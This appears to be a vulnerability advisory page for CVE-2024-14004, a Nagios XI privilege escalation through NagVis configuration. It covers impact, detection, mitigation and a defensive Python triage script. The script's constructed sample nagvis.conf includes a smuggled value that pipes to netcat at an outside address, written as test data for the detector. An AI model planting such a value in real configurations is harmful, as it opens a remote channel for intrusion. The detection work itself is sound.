Platform
nagios
Component
nagios-xi
Fixed in
2024R1.2
CVE-2024-14004 describes a privilege escalation vulnerability in Nagios XI. An authenticated user can gain elevated privileges on the Nagios XI host by manipulating NagVis configuration data in the nagvis.conf file. All versions prior to 2024R1.2 are affected; the fix ships in version 2024R1.2.
Successful exploitation of CVE-2024-14004 could give an attacker root or administrator-level access to the Nagios XI server, and with it complete system compromise: data theft, modification of system and monitoring configuration, and installation of malicious software. The attacker must already hold an authenticated account in the Nagios XI environment, but once that bar is cleared the path through NagVis configuration is relatively straightforward, so any low-privilege account is a viable starting point.
CVE-2024-14004 was publicly disclosed on 2025-10-30. Exploitation is not considered complex, and Nagios XI's widespread use in monitoring environments makes active exploitation plausible, although no public proof-of-concept exploit is known at the time of writing and the vulnerability has not been added to the CISA KEV catalog.
Organizations that rely on Nagios XI to monitor critical infrastructure are particularly exposed, since a monitoring server typically holds credentials for the systems it monitors. Environments with weak authentication or broad access to the Nagios XI web interface are more vulnerable, and instances shared by many users (managed-service or multi-tenant deployments) should be prioritized for patching, because every authenticated user already meets the precondition for exploitation.
• Examine the Nagios XI web server access logs for unusual requests to NagVis configuration endpoints (e.g., /nagvis/config.php), especially state-changing requests from accounts that have no reason to edit NagVis.
• Search nagvis.conf for unexpected or suspicious entries (e.g., with grep) and compare the file against a known-good copy or backup; also check its modification time and ownership.
• Monitor Nagios XI system resources (CPU, memory) for spikes. On its own this is a weak indicator, since a configuration-based privilege escalation need not consume noticeable resources.
• Check for unauthorized modifications to Nagios XI user accounts or permissions.
disclosure
Exploit Status
EPSS
0.10% (27th percentile)
CISA SSVC
The primary mitigation for CVE-2024-14004 is to upgrade Nagios XI to version 2024R1.2 or later. If an immediate upgrade is not possible, restrict access to the nagvis.conf file so that only the intended service account can modify it, limit which Nagios XI users can reach the NagVis configuration interface, and alert on any change to the file. A Web Application Firewall (WAF) can filter requests to NagVis configuration endpoints, but these measures only reduce exposure; the flaw lies in how Nagios XI processes the configuration data, so only the upgrade removes it. After upgrading, confirm the fix by attempting to manipulate NagVis configuration as a standard authenticated user; the changes should be rejected.
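The following script is an added example for the detection steps listed above and the nagvis.conf access restriction described in the mitigation; it is not code from the advisory page or from Nagios. It relies only on what the page states (fixed release 2024R1.2, the nagvis.conf file, requests to /nagvis/config.php). The sample log lines and configuration text are constructed, the combined-log regex assumes Apache/Nginx style access logs, and the "suspicious value" and "state-changing request under /nagvis/" rules are this example's own heuristics, not vendor detection signatures.

```python
"""Triage helpers for CVE-2024-14004 in Nagios XI (added example; not from
the advisory page or from Nagios).  Relies only on what the page states:
fixed release 2024R1.2, the nagvis.conf file, and requests to NagVis
configuration endpoints such as /nagvis/config.php.  Sample data below is
constructed; the detection heuristics are this example's assumptions."""
import re
import stat
from typing import Dict, List, Tuple

FIXED_VERSION = "2024R1.2"  # fixed release named in the advisory


def parse_xi_version(version: str) -> Tuple[int, ...]:
    """"2024R1.2" -> (2024, 1, 2); "2024R1" -> (2024, 1); legacy "5.11.3" ->
    (5, 11, 3).  Legacy releases sort below the year scheme, so plain tuple
    comparison reproduces "prior to 2024R1.2" as the page describes."""
    version = version.strip()
    if "R" in version:
        year, rest = version.split("R", 1)
        return (int(year),) + tuple(int(p) for p in rest.split(".") if p)
    return tuple(int(p) for p in version.split("."))


def is_affected(version: str) -> bool:
    """True when the installed version is older than the fixed release."""
    return parse_xi_version(version) < parse_xi_version(FIXED_VERSION)


# Combined log format; the third field is the authenticated (HTTP auth) user.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def triage_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests that could be writing NagVis configuration: any hit on
    /nagvis/config.php, or any state-changing request under /nagvis/
    (assumed rule).  Query strings are dropped so one endpoint groups
    together; the status is kept because rejected (403) attempts matter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m.group("path").split("?", 1)[0]
        if not path.startswith("/nagvis/"):
            continue
        if path.endswith("/config.php") or m.group("method") in ("POST", "PUT"):
            hit = {k: m.group(k) for k in ("ip", "user", "method", "status")}
            hit["path"] = path
            hits.append(hit)
    return hits


# Shell metacharacters or world-writable scratch paths inside a config value
# are a red flag (heuristic, not a vendor rule).
SUSPICIOUS_VALUE = re.compile(r"`|\$\(|\||/tmp/|/dev/shm/")


def suspicious_conf_entries(conf_text: str) -> List[Tuple[int, str]]:
    """(line number, line) for key = value entries with suspicious values;
    ';' or '#' comments and [section] headers are skipped."""
    findings = []
    for n, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in ";#[" or "=" not in line:
            continue
        if SUSPICIOUS_VALUE.search(line.split("=", 1)[1]):
            findings.append((n, line))
    return findings


def conf_permission_findings(mode, uid, gid, expected_uid, expected_gid):
    """Ways nagvis.conf could be changed by unintended users; takes raw
    os.stat fields so the logic runs without touching a real file."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP and gid != expected_gid:
        findings.append("group-writable by unexpected gid %d" % gid)
    if uid != expected_uid:
        findings.append("owned by unexpected uid %d" % uid)
    return findings


# Constructed sample input (not real traffic, not a real nagvis.conf).
SAMPLE_LOG = [
    '203.0.113.7 - bob [30/Oct/2025:10:01:12 +0000] "POST /nagvis/config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - alice [30/Oct/2025:10:02:40 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - bob [30/Oct/2025:10:03:05 +0000] "GET /nagvis/frontend/nagvis-js/index.php?mod=Map HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - bob [30/Oct/2025:10:03:55 +0000] "POST /nagvis/frontend/nagvis-js/index.php?mod=General HTTP/1.1" 403 64 "-" "Mozilla/5.0"',
]
SAMPLE_CONF = """\
; constructed sample, not a real nagvis.conf
[paths]
base = /usr/local/nagvis/
[backend_live_1]
socket = unix:/tmp/live.sock
htmlcgi = /nagios/cgi-bin/ | nc 203.0.113.7 4444
"""

if __name__ == "__main__":
    for v in ("5.11.3", "2024R1", "2024R1.2", "2024R2"):
        print(v, "affected" if is_affected(v) else "fixed")
    print(triage_access_log(SAMPLE_LOG))
    print(suspicious_conf_entries(SAMPLE_CONF))
    print(conf_permission_findings(0o100666, 1000, 1000, 0, 0))  # a 0666 file
```

To run the permission check against a live install, pass the fields of os.stat() on the real nagvis.conf (its location is not stated on this page) to conf_permission_findings together with the uid and gid the file is supposed to have; any non-empty result means someone other than the intended account can edit the file, which is exactly the access the mitigation asks you to remove.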
Upgrade Nagios XI to version 2024R1.2 or later. This update corrects the privilege escalation vulnerability related to the NagVis configuration. See the Nagios XI changelog for more details on the update.
CVE-2024-14004 is a vulnerability in Nagios XI versions prior to 2024R1.2 that allows authenticated users to potentially gain elevated privileges by manipulating NagVis configuration data.
You are affected if you are running any Nagios XI version prior to 2024R1.2. Upgrade to version 2024R1.2 or later to mitigate the vulnerability.
Upgrade Nagios XI to version 2024R1.2 or later. As a temporary workaround, restrict who can modify the nagvis.conf file and who can reach the NagVis configuration interface, and monitor the file for changes.
While no public exploits are currently available, the vulnerability's ease of exploitation suggests a potential for active exploitation.
Refer to the official Nagios XI security advisory for detailed information and instructions: [https://support.nagios.com/kb/article/137379/nagios-xi-security-vulnerability-cve-2024-14004/]